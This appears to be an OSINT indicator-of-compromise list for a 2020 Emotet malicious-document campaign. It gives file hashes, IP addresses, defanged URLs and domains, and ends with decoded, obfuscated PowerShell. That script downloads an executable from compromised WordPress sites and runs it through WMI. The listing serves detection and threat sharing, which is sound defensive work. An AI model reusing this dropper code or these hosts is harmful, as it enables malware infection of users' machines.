Emotet_Doc_out_2020-10-30_13_43.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 2efeab91d822ab76173df70e491b2cd6881d1435186ad6659da73c4e5c5214bf
5. 2efeab91d822ab76173df70e491b2cd6881d1435186ad6659da73c4e5c5214bf
6. 9c5b4f0d6c8c7b28d62d9b8ac13326bf4bb4bd938fea75a6ab10e0875b9b001b
7. 9c5b4f0d6c8c7b28d62d9b8ac13326bf4bb4bd938fea75a6ab10e0875b9b001b
8. d59b87dd3d075643377a93c2c9a0a308993c94b60fb201e1b825c2ede0441f1a
9. 612b66140b3b1ee1d77949fe254bb8348132d29b07fcbf108dcf5b85e98575b4
10. 9a4be820bf1a19b0f6e8e7be55bbd8ec017ff3125bd4ece187b347b1602a3ac8
11. f2ce2b3d2bf2f5d0f22eabb44f0b7c9183e0fea547e90ab926beae89d85cdf0e
12. 6270902fc810af901f9685bb0b3251f8cf96445514e9bd288b51d51156701665
13. 1e363452c2a67d40f01390488a99f68ce6fab805b45eab93ee2db2469bf1b05f
14. 2004d64ee603572e13a168eca558d2ade8169581208022e51896e0589e07116d
15. 3e7cecd24a5a4f442e024c198f65a755fceb5eb0e72b385bb636695a37805c0b
16. 3e7cecd24a5a4f442e024c198f65a755fceb5eb0e72b385bb636695a37805c0b
17. f861bf87ae94a28905aac6e55eb8f701589a30bcb2b6d452b8be5ce93f324bf0
18. f861bf87ae94a28905aac6e55eb8f701589a30bcb2b6d452b8be5ce93f324bf0
19. 78bd1c6e03aab90ba0350183bb9aba52148938c5c4384fb2695473c6540e139a
20. cc0614f4e21c1d63a80e1ddecfd591353e15aa849f754be9d8b709cc6e9841c9
21. cc0614f4e21c1d63a80e1ddecfd591353e15aa849f754be9d8b709cc6e9841c9
22. d577446435b94d0af2a829f1160b594e95c8051f6b069400ff61fa38d151ba54
23. d577446435b94d0af2a829f1160b594e95c8051f6b069400ff61fa38d151ba54
24. e37545649e9e7c9250af64a93a2fa3e37fd90ab7f9c16e96b4469290f309b52b
25. e37545649e9e7c9250af64a93a2fa3e37fd90ab7f9c16e96b4469290f309b52b
26. f2413a07e3362999d85fbab3f6c2fe8f228e4567eac899cd565ad65a2d0eede9
27. f2413a07e3362999d85fbab3f6c2fe8f228e4567eac899cd565ad65a2d0eede9
28. 56f61f11f75eabcc97d90aba385131e95efc547284902bf3e092349e7204858f
29. 9a3cf0ee5d4dd3b313ee5bcd29a8d47438f7eef1880734caca989e6ffbe45092
30. 61aa32a570716ce0d7c579186cd0cc291148bdeb623f0709c3a0b0b3f3d4d384
31. 14a8572928770f8d61fa05890c3e0a5cd4396bfde2ce2763d533e89d05120d34
32. 6a56325cee2a2a8f5e25ea794eac07e6822aafb9390f367bcc90bccc80090aa6
33. a914d86d2a97040bb1c91827828f9ec8e72e18d73ca90d884b5d385e4c9793f5
34. daeb92e05345d47a45c1b3280da742a4ebbfb30b3f4956e8f94b4dab762e91a7
35. e054d39b0aac7c2b6c6b76bc40435c1d0ffca154764349deefbc46f9d6ba453b
36. e054d39b0aac7c2b6c6b76bc40435c1d0ffca154764349deefbc46f9d6ba453b
37. 11ca328f60c6058bf42835808a9fe2b714662abe61af21015943c7628157d393
38. 11ca328f60c6058bf42835808a9fe2b714662abe61af21015943c7628157d393
39. ffc63081ade619c07061526c15e53d5dd012da2e842f479fefc0c27f46ce2beb
40. 41c1aacf38f4e4b127131377357db324852107ff972122bb57ec3ba8f894a7bd
41. 8810a3bb22ea0fde029efa89b401cdf843e46d10ba1eeff3522cb526f29e8ba7
42. 96636e8803958a85be6974b0fc6c91e24526ae529a00c31dcfdbf3ed761c5304
43. df1390a8493f224502992c62d7e529f871c9e850b53e3479d9de2d1994f8f91e
44. d7c0fc3658da4a6040cab7aff29764849e26c699642492446759314c94586b6d
45. 72cbfce2d1bb68f6583a651975d64056490779254d19bbf18636a754d88688c3
46. 289f8b4babc8f697bcbc3125ded9cfddefa96b986243538034beda8361d69a26
47. b48b7231ac7d5bc0a2ba5883e7a634a557c606b06b97bf45b2842523959c4a37
48. 682b88668279b5fb8415dfbe6b8a135dca290767dd5bed3fc6b45d230d3c3925
49.  
50.  
51. IPs:
52. 103.82.52.25
53. 104.18.62.171
54. 104.18.63.171
55. 104.24.98.175
56. 104.24.99.175
57. 104.27.132.14
58. 104.27.133.14
59. 104.28.22.149
60. 104.28.23.149
61. 104.28.24.139
62. 104.28.25.139
63. 104.28.6.70
64. 104.28.7.70
65. 104.31.68.179
66. 104.31.69.179
67. 112.74.91.108
68. 120.77.243.218
69. 123.59.232.99
70. 137.118.60.3
71. 148.72.93.189
72. 156.247.12.150
73. 172.67.132.92
74. 172.67.133.164
75. 172.67.178.62
76. 172.67.180.161
77. 172.67.180.46
78. 172.67.191.219
79. 172.67.220.107
80. 176.65.242.190
81. 192.151.155.100
82. 202.66.172.245
83. 209.103.180.4
84. 35.208.159.220
85. 35.213.176.43
86. 35.214.134.107
87. 35.214.15.47
88. 45.119.83.207
89. 47.106.177.2
90. 67.227.236.124
91. 79.172.193.70
92. 85.14.243.50
93. 96.17.68.91
94.  
95.  
96.  
97. URLs:
98. hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
99. hxxps://homewatchamelia.com/wp-admin/qmK/
100. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
101. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
102. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
103. hxxps://420extracts.ca/cgi-bin/Ecv/
104. hxxps://casinopalacett.com/wp-admin/voZDArg/
105.  
106.  
107. Domains:
108. enjoymylifecheryl.com
109. homewatchamelia.com
110. seramporemunicipality.org
111. imperfectdream.com
112. mayxaycafe.net
113. 420extracts.ca
114. casinopalacett.com
115.  
116.  
117. Decoded Base64 Powershell:
118. <���^, $8P4vcu = [tyPe]"{5}{2}{0}{3}{1}{4}" -f M.i,O,yste,O.dIrect,Ry,S ;
119. SeT LsV0 [tYpe]"{5}{0}{3}{1}{2}{4}{6}" -F.NE,V,IcEp,T.SeR,oInTmAnAG,sYSTeM,er ;
120. $Rlrkjnw=Qr1ru9y;
121. $D7qz32b=$Wa6rea4 [char]64 $Dehv673;
122. $O5aqk3g=Xa7q3h0;
123. dIr VARiAble:8P4Vcu.valuE::"cre`ATeD`IReCT`oRY"$HOME {0}Nscs8ry{0}S9t4g_l{0} -F [CHAr]92;
124. $Ga8ff5s=Nffefbg;
125. $lSv0::"sE`cU`Rit`yProToCOl" = Tls12;
126. $Ru818ii=Vzvdenv;
127. $G9po_gt = Epl6_wa2m;
128. $Yfwba66=Thli7b3;
129. $Irioufu=Y22l3ct;
130. $Llo6n_w=$HOME{0}Nscs8ry{0}S9t4g_l{0} -F [ChAR]92$G9po_gt.exe;
131. $Jvjds4y=G_wnx9u;
132. $H5xr5lm=.new-object nEt.webcLIENt;
133. $Mmo41vn=hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
134. hxxps://homewatchamelia.com/wp-admin/qmK/
135. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
136. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
137. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
138. hxxps://420extracts.ca/cgi-bin/Ecv/
139. hxxps://casinopalacett.com/wp-admin/voZDArg/."r`EP`Lace"/,[array]/,xwe[0]."sPl`It"$Chkut94 $D7qz32b $Opdketn;
140. $Rf7k3zk=Usfuthv;
141. foreach $Uhbkd7k in $Mmo41vn{try{$H5xr5lm."dO`wnl`Oa`DfIlE"$Uhbkd7k, $Llo6n_w;
142. $Fsiu4_x=Urtdzox;
143. If .Get-Item $Llo6n_w."Len`GTh" -ge 44263 {[wmiclass]win32_Process."Cre`A`Te"$Llo6n_w;
144. $Yzrcjro=T2a4ijn;
145. break;
146. $Ccwk57z=Lslfh6p}}catch{}}$L9wtd00=Vxbiwxu
147.